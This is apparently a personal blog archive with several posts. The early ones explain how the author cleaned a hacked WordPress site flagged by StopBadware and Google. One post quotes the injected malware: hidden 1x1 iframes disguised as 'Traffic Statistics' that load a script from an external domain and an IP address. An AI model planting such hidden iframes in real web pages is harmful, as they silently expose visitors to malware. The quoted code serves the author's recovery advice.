JasonMorrison.net

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src=”http://61.132.75.71/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe><br />
<!– End Traffic Statistics –>

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and few few good comments now and again but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my sites good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea - it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So Stopbadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses Wordpress and allows user comments. A bad link to show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness as upgrading Wordpress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to here back on my review, I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.

To complete my MS in Information Architecture and Knowledge Management at Kent State I did some research on folksonomies and how the can support information retrieval.  I compared social bookmarking systems with search engines and directories.  I’m hoping to see the results published in an academic journal.   In the mean time, you can see a pre-publication copy of my results:

Tagging and searching [pdf, 989K]

I’ve made a very small update to Procrastato, the only Firefox extension that will get you back on track when you are procrastinating. Really I just cleaned up some extra files that didn’t need to be included in the install.

Please head to the main project page to download and install the latest version.

As always, any comments or questions you have are welcome.

Mozy is a backup-service that will automatically back up your files on their server on a day-to-day basis when your computer is idle. I just signed up for it about a week ago.

This post is not really a product review. I haven’t used Mozy enough to fully recommend it yet and there are other similar services like Carbonite that I have no experience with. The important concept here is the automation, specifically the automation of tasks that I don’t really enjoy and normally take up big chunks of time.

Over the past year or so I have been trying to keep in mind the concept of opportunity cost–specifically, the cost of my time when I choose to spend it doing one thing and not another. So, in the past I would manually make backups every few months on DVDs. This takes time, requires me to remember all the drives and folders where I put things that are worth backing up, etc.

So now I think to myself, “what is the cost of using those hours to do backups instead of doing something else?” I could probably do some consulting work, and let’s say I would gain $50 an hour on average, taking into account time it takes to find people who need some work done, etc. Or I could work on refinishing my kitchen, work I don’t get paid for but that does prevent me from having to pay someone else. Or I could spend time with my wife, which I put a large value on.

So by installing Mozy, I have the piece of mind and mitigation of risk I had before (actually more, since these are finer-grained, off-site backups), and the $5.00 per month cost is more than made up by not wasting hundred of dollars in time over the course of the year.

Thanks to ITPro in the UK for reminding me the name of the service.

Earlier I mentioned that I have some photos uploaded to Panoramio. I’ve also played with Flickr off and on, and have recently started uploading some photos there as well. To add to the confusion, I use Picasa to manage photos on my hard drive, and my wife uses iPhoto on her Mac. Picasa has a web albums feature, and I’m sure iPhoto has something similar with a .Mac account.

Why use four different services that overlap each other to such a degree? Picasa and iPhoto both do the important job of managing photos locally, Flickr seems to have the largest community and the most widgets written for it, and Panoramio integrates with Google Earth. Since I want to do all those things, I have to use them all.

There are ways to make them play nice together. You can use a Gmail account to email photos from Picasa to Flickr, and so far it seems to work fairly well. There are a few iPhoto plugins to upload to Flickr and you can use iPhoto to subscribe to Flickr photostreams. Google just bought Panoramio, so I’m sure there will be more integration there soon as well.

Even with all these options, there are some annoyances. Picasa’s keyword tagging is not very useful, it only allows one-word tags. I tried creating multi-word tags with dashes or by enclosing them in quotes, but Picasa ate the special characters. There’s also the complication of managing public photos vs private photos.

Still, it is amazing how well these different websites and programs work together, through the magic of RSS, web API, and plain old email.

If you’d like, you can see my Flickr photos here. You can also see my photos in Panoramio, or just look close enough in Google Earth, since a few of my photos now how up there.

One of the best ways to show relationships in data is also one of the oldest: maps. There are lots of cool, fun visualizations out there like topic maps and tag clouds, but sometimes they emphasize form over function (and usability). Maps can be a great choice, even if your data is not directly geographical.

Here’s one example: a map of the United States showing where people use the terms “soda,” “pop,” or “coke.”

You might think this one was a pretty obvious choice, but you could definitely imagine someone using a pie chart to show the total percentages instead, throwing out a ton of information in the process.

Here’s one that’s a little more clever: a map of the United States, which each state labeled by a country with the same GDP. from strange maps.

Now, you could argue with the precision of presentation since most people don’t know the exact GDP of Algeria off the top of their heads. But show them a table of figures and ten minutes later they still won’t know. This is a much more interesting and memorable presentation of the data.

Here’s something interesting: the Last.fm mainstream-o-meter. Apparently my music tastes are 41.48% mainstream, at least within the Last.fm community. The biggest boost to my mainstreamness is Radiohead, which is listened to by an astounding 103.56% of Last.fm users.

Last.fm no doubt attracts a skewed population, but I do have to say I’m surprised that it continues to differ from radio playlists and CD sales. Radiohead is a perfect example - from my sampling of commercial radio over the past few years I would say they are almost completely absent. Yet a large number of people listen to Radiohead on their PCs.

Next up is a page that tells you which movie reviewer has tastes that best match yours. I’m sure we’ve all read reviews online or in the local paper and wondered if the reviewer saw the same movie. With sites like Rotten Tomatoes and Metacritic, you’re n longer limited to the opinions of a few writers. The average scores on those sites are interesting, but still don’t always match my tastes or your tastes. This will give you some names to look out for.

I had the chance to catch a presentation by Matt Bailey about web analytics and usability. He made a great point - a lot of the kinds of problems that we look for with usability testing should show up in your web log data too, if you know how to analyze it.